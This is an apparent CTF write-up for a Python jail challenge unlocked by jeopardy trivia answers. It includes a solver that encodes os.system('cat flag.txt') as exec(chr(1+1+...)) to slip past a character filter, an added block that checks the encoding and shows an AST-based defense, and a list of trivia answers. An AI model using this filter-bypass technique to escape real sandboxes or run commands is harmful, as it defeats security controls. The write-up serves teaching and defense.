Tags: jail jailbreak python-exploitation 

# Problem
We're stuck in a python jail, and the only way out is by answering questions on a variety of topics. We get only a few characters to help us escape the jail with each correct answer.

![A console displaying a table of jeopardy categories and dollar values](https://i.imgur.com/xnASd3j.png)

## Part 1

The first thing to do is start answering questions. For the most part, this just requires OSINT. Tantalisingly, one question is worth $10000 (and presumably every character we'll need to break out the "normal" way), but it asks us to find a password that's accidentally typed in a presentation (and we don't actually know where the video is, just that it exists and has to do with UMass Cybersecurity club).

For our purposes, these are the interesting questions:
* This year will be the next y2k thanks to some data types: 2038
* Where was the old honors college located? Orchard Hill
* What is the name of the mascot of UMass? Sam
* University of Michigan researchers controlled a Google Home from 230 feet away with what? Laser
* This was the most popular OS that was used in 2020: ios
* The answer to the life, universe, everything? In binary, of course.: 101010
* Country that US and Israeli has made multiple worms and malware against? Iran
* Movie where tic-tac-toe used to save the world? wargames
* Band that was recently threatened to have unreleased music released unless they pay the hackers money: radiohead

These nine questions and answers give us enough to work with.

## Part 2

Probe the jailbreak a little bit. You'll notice that it tells you when your code throws an error. So what happens if we just type "os" (assuming we actually have those characters)? There's no error, which means the os module is already available in the jail's namespace. We don't need to import anything, so we don't need those characters.

## The Break

So we are relatively limited in what characters we have, but we really want to run something to the effect of "os.system('ls')" (and likely then "os.system('cat flag.txt')"). We *could* spend a few hours of our lives trying to find the video with the password for the $10000 question, but is there a smarter way?

Yes, there is. Although we're restricted in which characters we can use, we do have c, h and r. That is enough to call the 'chr' function in Python, which converts a number to the character with that code point. "But wouldn't we then need numbers?" you ask. Normally yes, but we also have 1 and +, which, if we're patient, can be chained as 1+1+1+... to reach any number we need.

## The Code
I'm not patient enough to manually type out the right number of 1s, so I used code to do it for me. As you collect answers, you can put them into a text file as a list of commands. You then make the last line of that file "jailbreak" to start the jailbreak process.

Run the solve_jeopardy.py program and pipe the output into a netcat connection to the host.

### solve_jeopardy.py
```python
# Replay the collected answers first, one command per line; the file ends with "jailbreak".
with open('jeopardy.txt', 'r') as answers:
    for answer in answers:
        print(answer.strip())

# The command to run inside the jail once the characters c, h, r, 1, +, e, x, ( and ) are unlocked.
a = "os.system('cat flag.txt')"

def ones(x):
    # Spell ord(x) as 1+1+...+1 so the only digit needed is '1'.
    return '+'.join(['1'] * ord(x))

# Build exec(chr(1+1+...)+chr(...)+...) from the command string and print it as the final line.
print("exec(" + '+'.join([f'chr({ones(x)})' for x in a]) + ")")
```
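To make the point behind this writeup concrete from the jail author's side, here is an added example (not the writeup's solver and not the CTF's own jail code). It reuses the chr()/1+1+1 encoding explained above, checks the encoded payload against an assumed allowed alphabet (the characters the writeup had earned plus the ones exec() needs; the real jail's filter is not on the page, so ALLOWED is a guess), confirms the encoding round-trips without executing anything, and then runs the kind of AST check a jail should do instead of counting characters. All function names are hypothetical.

```python
import ast

# Assumed allowed alphabet (hypothetical): the writeup names c, h, r, 1 and +,
# and exec() needs e, x and parentheses. The real jail's character filter is not on the page.
ALLOWED = set("chr1+exc()")


def ones(n):
    """Spell the integer n as 1+1+...+1 (n ones), using only '1' and '+'."""
    return "+".join(["1"] * n)


def encode(text):
    """Rewrite text as chr(1+1+...)+chr(...)+... so only c, h, r, 1, +, ( and ) appear."""
    return "+".join(f"chr({ones(ord(ch))})" for ch in text)


def payload(text):
    """Wrap the encoded string in exec(...), the shape of the final line the solver prints."""
    return f"exec({encode(text)})"


def uses_only(expr, allowed):
    """What a character-blacklist jail checks: does expr contain only allowed characters?"""
    return set(expr) <= set(allowed)


def decode(expr):
    """Round-trip check only: evaluate the chr(...) chain with chr as the sole builtin.
    Nothing is executed; the result is just the reconstructed string."""
    return eval(expr, {"__builtins__": {"chr": chr}}, {})


DANGEROUS_NAMES = {"exec", "eval", "compile", "__import__", "getattr"}
DANGEROUS_ATTRS = {"system", "popen"}


def flag_dangerous_calls(source):
    """The check a jail should do instead of counting characters: parse the source and
    report calls to code-execution builtins or to process-spawning attributes.
    The encoded payload still parses to a Call whose func is Name('exec'),
    so spelling the argument with chr() does not hide it from the AST."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name) and fn.id in DANGEROUS_NAMES:
                found.add(fn.id)
            elif isinstance(fn, ast.Attribute) and fn.attr in DANGEROUS_ATTRS:
                found.add(fn.attr)
    return sorted(found)


if __name__ == "__main__":
    cmd = "os.system('cat flag.txt')"  # the command string from the writeup
    p = payload(cmd)
    print("raw command passes the character filter:", uses_only(cmd, ALLOWED))
    print("encoded payload passes the character filter:", uses_only(p, ALLOWED))
    print("payload length in characters:", len(p))
    print("decoded back to the original:", decode(encode(cmd)) == cmd)
    print("AST check flags:", flag_dangerous_calls(p))
```

The two filter results side by side are the whole lesson: the raw command fails the character check and the encoded one passes it, while the AST check flags both, because it looks at what the code calls rather than how the string is spelled. A jail that wants to allow Python but not command execution has to restrict the names and builtins available (or parse and reject calls like these), not the alphabet.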

### jeopardy.txt
```
ready
miscellaneous 100
hackthebox
miscellaneous 200
ios
miscellaneous 300
101010
miscellaneous 400
4
cybersecurity tomorrow 100
quantum
cybersecurity tomorrow 200
2038
cybersecurity tomorrow 300
humans
cybersecurity tomorrow 400
ARM
cybersecurity tomorrow 500
deepfakes
cybersecurity yesterday 100
captain crunch
cybersecurity yesterday 200
wargames
cybersecurity yesterday 300
iran
cybersecurity yesterday 400
reaper
cybersecurity now 100
39
cybersecurity now 200
laser
cybersecurity now 300
radiohead
cybersecurity now 400
microsoft
cybersecurity now 500
dog
umass 100
sam
umass 200
dining
umass 300
franklin
umass 400
orchard hill
umass 500
jolly roger
jailbreak
```